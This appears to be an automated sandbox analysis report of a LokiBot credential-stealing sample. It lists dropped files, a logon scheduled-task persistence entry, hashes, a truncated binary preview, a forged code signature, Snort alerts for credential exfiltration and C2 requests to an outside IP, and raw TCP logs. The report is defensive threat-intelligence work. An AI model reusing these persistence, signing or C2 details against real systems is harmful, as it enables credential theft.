                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Roaming\188E93\31437F.lck

                                              Download File
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

                                              Download File
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):46
                                              Entropy (8bit):1.0424600748477153
                                              Encrypted:false
                                              SSDEEP:3:/lbq:4
                                              MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                              SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                              SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                              SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                              Malicious:false
                                              Preview:........................................user.

                                              C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):705032
                                              Entropy (8bit):7.950061434391321
                                              Encrypted:false
                                              SSDEEP:12288:6jqnHvjNIrpf9rN/mc/CPV77Qykhe+AK9hCqAZHApvF1sdsgTWEmBuPg6AbTokR:6GPjKr5BNDAF7GAKeZHApvFWdsisBuoT
                                              MD5:4B905E6548F4D5040FAB8962CB71877E
                                              SHA1:15C3785700D10E32CE7E17D706194DD9BAA8442A
                                              SHA-256:6FD2687A66899AA63357F7434A418B2BD873EEBDA9520129B20FD3E7E889CED1
                                              SHA-512:75BEEFB8E58CC71F433980CEB6FF74C022D35332037B905E9E6644E09DEA33BA36B41DD4C8E1E6874F302208FCCD93AD258C74D09C08828D65BF7661026A3CAD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 18%
                                              • Antivirus: Virustotal, Detection: 32%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+f..............0..T...6.......s... ........@.. ....................................@.................................|s..O........2...............6........................................................... ............... ..H............text....S... ...T.................. ..`.rsrc....2.......4...V..............@..@.reloc..............................@..B.................s......H........]...p..........................................................:.(......}....*..0...........(....o'....(......(....o+.......o*...(....o)...(.......o-.....(......(......o........r...po......o.....o.....o......o.........(........o.....3....o .......r...ps!...z&....*.........m.:........0..;.......("...r...po#...o$...s%....s&.....r...po......o'....o....((...,..o)...r...p~*...o+...&+..o)...r...p.o....o+...&.o....((...,..o)...r...p~*...o+...&+..o)...r...p.o....o+...&.o....

                                              C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.950061434391321
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                              • Win32 Executable (generic) a (10002005/4) 49.93%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:gunzipped.exe
                                              File size:705'032 bytes
                                              MD5:4b905e6548f4d5040fab8962cb71877e
                                              SHA1:15c3785700d10e32ce7e17d706194dd9baa8442a
                                              SHA256:6fd2687a66899aa63357f7434a418b2bd873eebda9520129b20fd3e7e889ced1
                                              SHA512:75beefb8e58cc71f433980ceb6ff74c022d35332037b905e9e6644e09dea33ba36b41dd4c8e1e6874f302208fccd93ad258c74d09c08828d65bf7661026a3cad
                                              SSDEEP:12288:6jqnHvjNIrpf9rN/mc/CPV77Qykhe+AK9hCqAZHApvF1sdsgTWEmBuPg6AbTokR:6GPjKr5BNDAF7GAKeZHApvFWdsisBuoT
                                              TLSH:2CE412617778D393C2B15BB045B8D5AA5BB7A5563A20D3CD0DA4618F2BD0B80FF20B63
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+f..............0..T...6.......s... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:49598b8999894929

                                              Static PE Info

                                              General

                                              Entrypoint:0x4a73ce
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x662B05C9 [Fri Apr 26 01:39:21 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                              Subject Chain
                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                              Version:3
                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                              Serial:7C1118CBBADC95DA3752C46E47A27438

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              cmp byte ptr [edi+38h], cl
                                              pop edx
                                              xor eax, 50374856h
                                              xor al, 00h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [ecx+42h], al
                                              cmp byte ptr [esp+esi+51h], dl
                                              cmp byte ptr [ecx+4Fh], dl
                                              inc esp
                                              push ebp
                                              inc ebp
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa737c0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x3204.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xa8c000x3608
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xa53f40xa54003a556957711ec72af595ebb21532f82dFalse0.9293373558055976data7.958469565640936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xa80000x32040x3400ed07a8a4fcd614debca9a1d7299c7c22False0.8815354567307693data7.559385490334242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xac0000xc0x2008375fa9d1f50fda2a9cab47641c55246False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xa80c80x2d07PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9655591220612475
                                              RT_GROUP_ICON0xaade00x14data1.05
                                              RT_VERSION0xaae040x3fcdata0.42745098039215684

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              04/26/24-04:57:31.331813TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.445.77.223.48
                                              04/26/24-04:57:25.359561TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.445.77.223.48
                                              04/26/24-04:57:09.548217TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973880192.168.2.445.77.223.48
                                              04/26/24-04:57:25.359561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.445.77.223.48
                                              04/26/24-04:57:31.331813TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.445.77.223.48
                                              04/26/24-04:57:31.331813TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.445.77.223.48
                                              04/26/24-04:57:21.056286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.445.77.223.48
                                              04/26/24-04:57:23.949613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.445.77.223.48
                                              04/26/24-04:57:25.359561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.445.77.223.48
                                              04/26/24-04:57:21.056286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.445.77.223.48
                                              04/26/24-04:57:21.056286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.445.77.223.48
                                              04/26/24-04:57:23.949613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.445.77.223.48
                                              04/26/24-04:57:08.113616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.445.77.223.48
                                              04/26/24-04:57:08.113616TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973780192.168.2.445.77.223.48
                                              04/26/24-04:57:16.639664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.445.77.223.48
                                              04/26/24-04:57:16.639664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.445.77.223.48
                                              04/26/24-04:57:16.639664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.445.77.223.48
                                              04/26/24-04:57:29.559162TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.445.77.223.48
                                              04/26/24-04:57:26.717841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.445.77.223.48
                                              04/26/24-04:57:29.559162TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.445.77.223.48
                                              04/26/24-04:57:29.559162TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.445.77.223.48
                                              04/26/24-04:57:12.236287TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.445.77.223.48
                                              04/26/24-04:57:19.622306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.445.77.223.48
                                              04/26/24-04:57:12.236287TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.445.77.223.48
                                              04/26/24-04:57:26.717841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.445.77.223.48
                                              04/26/24-04:57:19.622306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.445.77.223.48
                                              04/26/24-04:57:26.717841TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.445.77.223.48
                                              04/26/24-04:57:08.113616TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973780192.168.2.445.77.223.48
                                              04/26/24-04:57:19.622306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.445.77.223.48
                                              04/26/24-04:57:12.236287TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.445.77.223.48
                                              04/26/24-04:57:28.121110TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.445.77.223.48
                                              04/26/24-04:57:10.856048TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.445.77.223.48
                                              04/26/24-04:57:23.949613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.445.77.223.48
                                              04/26/24-04:57:18.033252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.445.77.223.48
                                              04/26/24-04:57:22.484753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.445.77.223.48
                                              04/26/24-04:57:10.856048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.445.77.223.48
                                              04/26/24-04:57:28.121110TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.445.77.223.48
                                              04/26/24-04:57:10.856048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.445.77.223.48
                                              04/26/24-04:57:18.033252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.445.77.223.48
                                              04/26/24-04:57:22.484753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.445.77.223.48
                                              04/26/24-04:57:09.548217TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.445.77.223.48
                                              04/26/24-04:57:28.121110TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.445.77.223.48
                                              04/26/24-04:57:09.548217TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973880192.168.2.445.77.223.48
                                              04/26/24-04:57:22.484753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.445.77.223.48
                                              04/26/24-04:57:18.033252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.445.77.223.48

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 26, 2024 04:57:07.923290014 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:08.111411095 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:08.111506939 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:08.113615990 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:08.298657894 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:08.300956964 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:08.486089945 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.199505091 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.199570894 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.199605942 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.199619055 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.199660063 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.199660063 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.208127975 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.208230019 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.208436966 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.208486080 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.208544970 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.208606958 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.208736897 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.208790064 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.208884001 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.208923101 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.208925009 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.208965063 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.209387064 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.209435940 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.359895945 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.385356903 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.385416985 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.385420084 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.385526896 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.385575056 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.545978069 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.546103001 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.548217058 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.734386921 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.736443043 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.922961950 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.612135887 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.612238884 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.612258911 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.612287045 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.612293005 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.612355947 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.621912956 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.621972084 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622256994 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622311115 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622353077 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622391939 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622523069 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622662067 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622710943 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622710943 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622757912 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622801065 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622806072 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622838974 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.666614056 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.797975063 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.798130035 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.798132896 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.798177958 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.798229933 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.798275948 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.854001045 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.854126930 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.856048107 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.042500019 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.042620897 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.229470015 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.914695024 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.914824009 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.914849997 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.914946079 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.915000916 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.915123940 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.923022032 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.923074007 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.923624039 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.923701048 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924005985 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924051046 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924097061 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924233913 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924268007 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924268007 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924304962 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924349070 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924384117 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924424887 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.046821117 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.101588011 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.101649046 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.101721048 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.101773977 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.101883888 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.102046013 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.233901024 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.234015942 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.236287117 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.423437119 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.423620939 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.611402988 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.293761015 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.293822050 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.293935061 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.293935061 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.293987036 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.294023037 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.294042110 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.294135094 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.294197083 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.294250011 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.302445889 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.302510023 CEST4974280192.168.2.445.77.223.48
